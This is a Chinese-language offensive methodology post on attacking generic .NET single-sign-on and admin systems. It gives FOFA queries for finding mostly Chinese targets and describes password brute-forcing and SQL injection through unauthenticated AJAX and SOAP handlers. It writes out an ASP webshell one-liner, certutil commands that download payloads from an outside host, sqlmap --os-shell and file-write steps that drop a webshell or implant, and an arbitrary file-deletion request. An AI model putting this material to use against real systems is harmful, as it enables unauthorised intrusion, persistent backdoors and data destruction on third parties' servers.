通用型別漏洞思路

通用系統分類：開源系統、閉源系統、售賣系統

目標蒐集

body="技術支援："&& title="登入"

title="系統管理"&& body="登入登陸"

Country="CN" && bodu="js/login.js" && title = "使用者" 等等

這類的方法有個弊端，效率不是很高。我們可以在收集目標的時候利用一些JavaScript 庫進行目標搜尋，這類的 JavaScript 庫基本上都用於單點登入系統上，例如：

body="jquery/jquery-1.11.1.js" && country="CN" && body!="privacycn.pl" &&title!="login"

操作演示（fofa）

body="jquery.spritely-0.6.js"&& country="CN"

還可以通過 批量搜尋 JavaScript 庫 組合騷語句 讓目標搜尋更高效

對單點登入系統的未授權漏洞挖掘小思路

這裡主要是對.net 平臺進行思路分享，因為就目前單點登入系統，除了那幾家廠商，其他的基本都是.net 或者 java 開發的拋開其他的不談，java 開發的是真的難日，就一個登入框，就算挖到了也不一定能未授權(不需要登入的情況下)打進去在面對一個登入框的時候，我一般會先操起 Burp 爆破一波賬號密碼，既然是通用，那麼肯定就有那麼一兩個粗心的管理員把賬號密碼設定為弱口令，如果能弱口令進去，找幾個介面挖未授權漏洞都很容易，在這兒需要注意的是登入的時候抓包的問題就比如這個通用系統，賬號密碼爆破成功了，賬號 admin 密碼 admin 第一個為登入包

js 路徑爆破，網上收集js檔案路徑尋找js檔案中帶有Ajax的快取有百分之八九十都是未授權的

例如：url:"../xxxx/xxxx.ashx" 再構造 pst 資料包將錯誤的paloay（各種報錯payload參考：(182條訊息) SQL注入之報錯注入的一些隨筆_鬱離歌的部落格-CSDN部落格_sql報錯注入） 打過去就成功了通過注入點寫檔案-->拿 shell-->到最後一步(拿 shell 找介面反編譯 dl 白盒滲透)

補充

mssql 資料庫中文網站路徑無法用echo寫shell問題，sqlmap執行--os-shell後用echo寫shell

如下最常用的echo寫shell，echo ^<^%eval request("z")%^>^> E:\\1 專案資料\E7HRBLL\\Report\\KaoQin\\1.aspcmd 中 sqlmap將“E:1\專案資料\E7HRBLL\Report\KaoQin\1.asp”這個預設utf8 編碼的路徑進行 hex 編碼然後傳參到 gbk 編碼的 mssql 資料庫中執行。中文路徑會直接亂碼，導致無法寫 shell。

解決辦法：

1 使用certutil.exe下載certutil -urlcache -split -f http://xss.xiuo9.cn/1.execertutil.exe -urlcache -split -f http://xss.xiu09.cn/1.txt D:\1.asp

2 使用 sqlmap 自帶上傳功能（也是利用 certutil.exe，但是相容性更好，推薦使用)首先在本機寫一個 gbk 編碼的 txt，內容是 echo 寫木馬

然後 SQLmap 執行-file-write C\Usersxiu\Desktop\1.txt -file-dest D:\1.bat將本地1.txt 上傳到對方機器 d 盤 1.bat然後在 os-shell中執行1.bat可以自動將shell寫到自己想寫的路徑也可以用於寫上線馬

通過其他埠拿到原始碼後的簡單利用

通過 js/爆破等方法都無法進—步利用，可以 fofa 搜這個通用的系統的其他埠

拿到原始碼之後要怎麼做

拿到原始碼之後，第一時間尋找 web.config（詳見web.config配置詳細說明 - kevin860 - 部落格園 (cnblogs.com)），看配置檔案，有寫有資料庫的東西跟一下介面

接下來就尋找 asmx 結尾的檔案

asmx 是什麼？asmx 是 WEB 服務檔案asmx.cs 裡有相關程式碼屬於 B/S 形式，用 SOAP 方式 HTTP 訪問，用 XML 返回可以返回基礎型別和 PUBLIC 結構型別。

在 C/S 結構中經常用到

soap 最容易出現什麼漏洞

注入、上傳、各種資訊洩露等等

最簡單的辦法，發現 soap直接丟到sqlmap百分之八十出注入

尋找 ashx 結尾的檔案，ashx是sapx 的眾多元件之一，也是.net 的副檔名之一我們也可以把ashx理解成各種方法通過Class類找到對應的dll檔案，拖到dnspy反編譯比如說upload.ashx找到對應的dll檔案拖到 dnspy 反編譯使用action來呼叫方法並且upload.ashx有多達 30 多個方法，然而程式設計師將只調用了幾個有攔截的檔案上傳介面，這些沒攔截的任意檔案上傳和任意檔案刪除方法不通過反編譯是挖掘不了的任意檔案刪除方法http://xxxxxx0xxx/Ajax/upload.ashx?action=deleteBackground&nameD:/FumaBS_New/1.txt

思路：

1.爆破js尋找有沒有asmx的檔案

2.目錄遍歷尋找saop介面，一般有目錄遍歷有百分之八十是能找到soap介面

補充：利用反編譯尋找其他的方法，.net可以掃備份檔案